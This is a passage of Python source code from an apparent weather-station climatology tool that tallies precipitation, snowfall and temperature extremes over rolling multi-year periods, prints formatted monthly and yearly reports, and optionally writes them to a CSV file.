climo30yrs[c]["tminPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmin"]) == climo30yrs[c]["tminPROP"]["month_min"][0]: climo30yrs[c]["tminPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmin"]) < climo30yrs[c]["tminPROP"]["month_min"][0]: climo30yrs[c]["tminPROP"]["month_min"][0] = mean(clmt[y][m]["tmin"]) climo30yrs[c]["tminPROP"]["month_min"][1] = [] climo30yrs[c]["tminPROP"]["month_min"][1].append(y) # PRINT REPORT print("--------------------------------") print("Climatology Report for {}".format(calendar.month_name[m])) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("--------------------------------") print("Part 1: {} Precipitation Stats".format(calendar.month_name[m])) print("{:▒^9} {:▒^11} {:▒^8} {:▒^8} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^8} {:▒^6} {:▒^12} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^11} {:▒^8} {:▒^8} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^8} {:▒^6} {:▒^12} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^11} {:-^8} {:-^8} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^8} {:-^6} {:-^12} |".format("","","","","","","","","","","")) print("{:^9} {:4}:{:>5}% {:>2}, {:^4} {:>2}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>2}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["month_max_days"][0], alltime["prcpPROP"]["month_max_days"][1][0] if len(alltime["prcpPROP"]["month_max_days"][1]) == 1 else len(alltime["prcpPROP"]["month_max_days"][1]), alltime["prcpPROP"]["month_min_days"][0], alltime["prcpPROP"]["month_min_days"][1][0] if len(alltime["prcpPROP"]["month_min_days"][1]) == 1 else len(alltime["prcpPROP"]["month_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["month_max"][0],2), alltime["prcpPROP"]["month_max"][1][0] if len(alltime["prcpPROP"]["month_max"][1]) == 1 else len(alltime["prcpPROP"]["month_max"][1]), round(alltime["prcpPROP"]["month_min"][0],2), alltime["prcpPROP"]["month_min"][1][0] if len(alltime["prcpPROP"]["month_min"][1]) == 1 else len(alltime["prcpPROP"]["month_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["month_max_days"][0], alltime["snowPROP"]["month_max_days"][1][0] if len(alltime["snowPROP"]["month_max_days"][1]) == 1 else len(alltime["snowPROP"]["month_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["month_max"][0],2), alltime["snowPROP"]["month_max"][1][0] if len(alltime["snowPROP"]["month_max"][1]) == 1 else len(alltime["snowPROP"]["month_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:4}:{:>5}% {:>2}, {:^4} {:>2}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>2}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["month_max_days"][0], climo30yrs[c]["prcpPROP"]["month_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_max_days"][1]), climo30yrs[c]["prcpPROP"]["month_min_days"][0], climo30yrs[c]["prcpPROP"]["month_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["month_max"][0],2), climo30yrs[c]["prcpPROP"]["month_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_max"][1]), round(climo30yrs[c]["prcpPROP"]["month_min"][0],2), climo30yrs[c]["prcpPROP"]["month_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["month_max_days"][0], climo30yrs[c]["snowPROP"]["month_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["month_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["month_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["month_max"][0],2), climo30yrs[c]["snowPROP"]["month_max"][1][0] if len(climo30yrs[c]["snowPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["month_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: {} Temperature Stats".format(calendar.month_name[m])) print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["month_max"][0],1), alltime["tavgPROP"]["month_max"][1][0] if len(alltime["tavgPROP"]["month_max"][1]) == 1 else len(alltime["tavgPROP"]["month_max"][1]), round(alltime["tavgPROP"]["month_min"][0],1), alltime["tavgPROP"]["month_min"][1][0] if len(alltime["tavgPROP"]["month_min"][1]) == 1 else len(alltime["tavgPROP"]["month_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["month_max"][0],1), alltime["tmaxPROP"]["month_max"][1][0] if len(alltime["tmaxPROP"]["month_max"][1]) == 1 else len(alltime["tmaxPROP"]["month_max"][1]), round(alltime["tmaxPROP"]["month_min"][0],1), alltime["tmaxPROP"]["month_min"][1][0] if len(alltime["tmaxPROP"]["month_min"][1]) == 1 else len(alltime["tmaxPROP"]["month_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["month_max"][0],1), alltime["tminPROP"]["month_max"][1][0] if len(alltime["tminPROP"]["month_max"][1]) == 1 else len(alltime["tminPROP"]["month_max"][1]), round(alltime["tminPROP"]["month_min"][0],1), alltime["tminPROP"]["month_min"][1][0] if len(alltime["tminPROP"]["month_min"][1]) == 1 else len(alltime["tminPROP"]["month_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["month_max"][0],1), climo30yrs[c]["tavgPROP"]["month_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["month_max"][1]), round(climo30yrs[c]["tavgPROP"]["month_min"][0],1), climo30yrs[c]["tavgPROP"]["month_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["month_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["month_max"][0],1), climo30yrs[c]["tmaxPROP"]["month_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["month_max"][1]), round(climo30yrs[c]["tmaxPROP"]["month_min"][0],1), climo30yrs[c]["tmaxPROP"]["month_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["month_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["month_max"][0],1), climo30yrs[c]["tminPROP"]["month_max"][1][0] if len(climo30yrs[c]["tminPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["month_max"][1]), round(climo30yrs[c]["tminPROP"]["month_min"][0],1), climo30yrs[c]["tminPROP"]["month_min"][1][0] if len(climo30yrs[c]["tminPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["month_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "monthReport_" + str(calendar.month_name[m]) + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({})".format(str(calendar.month_name[m])),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tempAVGlist_ind"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmin"]),1))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tempAVGlist_ind"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmin"]),1))); w.write("\n") print("*** csv output successful ***") def yearReport(climatology=30,increment=5,output=False): """Detailed Climatological Report all calendar years on record * no required arguments * Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: yearReport() -> Returns a 30-yr, 5-yr incremented climatological report for all calendar years on record yearReport(climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for all years. yearReport(climatology=20,increment=1,output=True) -> Returns a 1-yr incremented, 20yr climatology report for all years and outputs a CSV. """ valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} print("*** PLEASE WAIT. This will take a few moments ***") for y in valid_yrs: alltime["total_days"] += clmt[y]["recordqty"] # PRCP alltime["prcp"].append(sum(clmt[y]["prcp"])) alltime["prcpPROP"]["days"] += clmt[y]["prcpDAYS"] if clmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][1].append(y) elif clmt[y]["prcpDAYS"] > alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][0] = clmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_max_days"][1] = [] alltime["prcpPROP"]["year_max_days"][1].append(y) if sum(clmt[y]["prcp"]) == alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][1].append(y) elif sum(clmt[y]["prcp"]) > alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][0] = sum(clmt[y]["prcp"]) alltime["prcpPROP"]["year_max"][1] = [] alltime["prcpPROP"]["year_max"][1].append(y) if clmt[y]["recordqty"] > excludeyear: if clmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][1].append(y) elif clmt[y]["prcpDAYS"] < alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][0] = clmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_min_days"][1] = [] alltime["prcpPROP"]["year_min_days"][1].append(y) if sum(clmt[y]["prcp"]) == alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][1].append(y) elif sum(clmt[y]["prcp"]) < alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][0] = sum(clmt[y]["prcp"]) alltime["prcpPROP"]["year_min"][1] = [] alltime["prcpPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(clmt[y]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += clmt[y]["prcpDAYS"] climo30yrs[c]["total_days"] += clmt[y]["recordqty"] if clmt[y]["recordqty"] > excludeyear: if clmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) elif clmt[y]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][0] = clmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) if clmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) elif clmt[y]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][0] = clmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) if sum(clmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) elif sum(clmt[y]["prcp"]) > climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][0] = sum(clmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_max"][1] = [] climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) if sum(clmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) elif sum(clmt[y]["prcp"]) < climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][0] = sum(clmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_min"][1] = [] climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) # SNOW alltime["snow"].append(sum(clmt[y]["snow"])) alltime["snowPROP"]["days"] += clmt[y]["snowDAYS"] if clmt[y]["recordqty"] > excludeyear: if clmt[y]["snowDAYS"] == alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][1].append(y) elif clmt[y]["snowDAYS"] > alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][0] = clmt[y]["snowDAYS"] alltime["snowPROP"]["year_max_days"][1] = [] alltime["snowPROP"]["year_max_days"][1].append(y) if sum(clmt[y]["snow"]) == alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][1].append(y) elif sum(clmt[y]["snow"]) > alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][0] = sum(clmt[y]["snow"]) alltime["snowPROP"]["year_max"][1] = [] alltime["snowPROP"]["year_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(clmt[y]["snow"])) climo30yrs[c]["snowPROP"]["days"] += clmt[y]["snowDAYS"] if clmt[y]["recordqty"] > excludeyear: if clmt[y]["snowDAYS"] == climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) elif clmt[y]["snowDAYS"] > climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][0] = clmt[y]["snowDAYS"] climo30yrs[c]["snowPROP"]["year_max_days"][1] = [] climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) if sum(clmt[y]["snow"]) == climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][1].append(y) elif sum(clmt[y]["snow"]) > climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][0] = sum(clmt[y]["snow"]) climo30yrs[c]["snowPROP"]["year_max"][1] = [] climo30yrs[c]["snowPROP"]["year_max"][1].append(y) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in clmt[y]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(clmt[y]["tempAVGlist"]) > excludeyear_tavg: alltime["tempAVGlist"].append(mean(clmt[y]["tempAVGlist"])) if mean(clmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) > alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][0] = mean(clmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_max"][1] = [] alltime["tavgPROP"]["year_max"][1].append(y) if mean(clmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) < alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][0] = mean(clmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_min"][1] = [] alltime["tavgPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(clmt[y]["tempAVGlist"]) > excludeyear_tavg: climo30yrs[c]["tempAVGlist"].append(mean(clmt[y]["tempAVGlist"])) if mean(clmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][0] = mean(clmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_max"][1] = [] climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) if mean(clmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][0] = mean(clmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_min"][1] = [] climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) # TMAX for x in clmt[y]["tmax"]: alltime["tmax"].append(x) if len(clmt[y]["tmax"]) > excludeyear: if mean(clmt[y]["tmax"]) == alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmax"]) > alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][0] = mean(clmt[y]["tmax"]) alltime["tmaxPROP"]["year_max"][1] = [] alltime["tmaxPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmax"]) == alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmax"]) < alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][0] = mean(clmt[y]["tmax"]) alltime["tmaxPROP"]["year_min"][1] = [] alltime["tmaxPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(clmt[y]["tmax"]) > excludeyear: if mean(clmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmax"]) > climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][0] = mean(clmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_max"][1] = [] climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmax"]) < climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][0] = mean(clmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_min"][1] = [] climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) # TMIN for x in clmt[y]["tmin"]: alltime["tmin"].append(x) if len(clmt[y]["tmin"]) > excludeyear: if mean(clmt[y]["tmin"]) == alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmin"]) > alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][0] = mean(clmt[y]["tmin"]) alltime["tminPROP"]["year_max"][1] = [] alltime["tminPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmin"]) == alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmin"]) < alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][0] = mean(clmt[y]["tmin"]) alltime["tminPROP"]["year_min"][1] = [] alltime["tminPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(clmt[y]["tmin"]) > excludeyear: if mean(clmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmin"]) > climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][0] = mean(clmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_max"][1] = [] climo30yrs[c]["tminPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmin"]) < climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][0] = mean(clmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_min"][1] = [] climo30yrs[c]["tminPROP"]["year_min"][1].append(y) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for All Years on Record") print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} 